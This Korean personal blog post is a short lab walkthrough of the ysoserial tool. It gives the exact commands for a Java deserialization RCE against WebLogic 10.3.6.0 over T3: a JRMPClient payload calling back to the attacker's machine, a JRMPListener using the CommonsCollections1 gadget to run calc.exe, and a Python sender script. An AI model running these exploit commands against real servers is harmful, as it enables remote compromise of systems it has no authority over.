Notice
Recent Posts
Recent Comments
Link
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
Archives
Today
Total
관리 메뉴

의미없는 블로그

[Tools] ysoserial 사용하기 본문

# 나/pentest (WEB)

[Tools] ysoserial 사용하기

SaltLee 2019. 12. 12. 17:13

자바 직렬화/역직렬화 라고 해서

자바 객체를 Stream 형식으로 해서 전송 가능한 형태로 만드는게 직렬화

그 반대가 역직렬화 인 것 같은데

 

직렬화/역직렬화 할 때 취약점 발생 포인트가 있나보다

그걸 사용한 취약점 검증 툴 이라고 하네?

 

잘 모르겠고 RCE 취약점 검증할 때 가끔 쓰이길래 정리쓰

 

참고 : https://github.com/frohoff/ysoserial

다운로드 : https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

 

참고에 github 들어가서 download 받을 수 있다(ysoserial-master-SNAPSHOT.jar)

 

웹로직에서 RCE 테스트 해보기

아래 파일은 그냥 웹로직 T3 프로토콜 이용해서 취약점 발생시키는 코드 그런? (제대로 아는게 없음)

weblogic.py
0.01MB

 

공격자(192.168.211.128 - Kali)

희생자(192.168.211.130 - Weblogic 10.3.6.0)

공격자 IP의 1006 포트로 접속하도록 하는걸 payload2.out 에다가 생성하고

java -jar ysoserial.jar JRMPClient 192.168.211.128:1006 > payload2.out

 

1006 포트로 접속했을 때 calc.exe 가 실행되도록 대기

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1006 CommonCollections1 'calc.exe'

아까 파이썬 파일 사용해서 희생자 IP, Port, payload2.out(공격자 IP, Port) 인자로 넣는다

python weblogic.py 192.168.211.130 7001 payload2.out

희생자 PC 에서 계산기 실행된다

Comments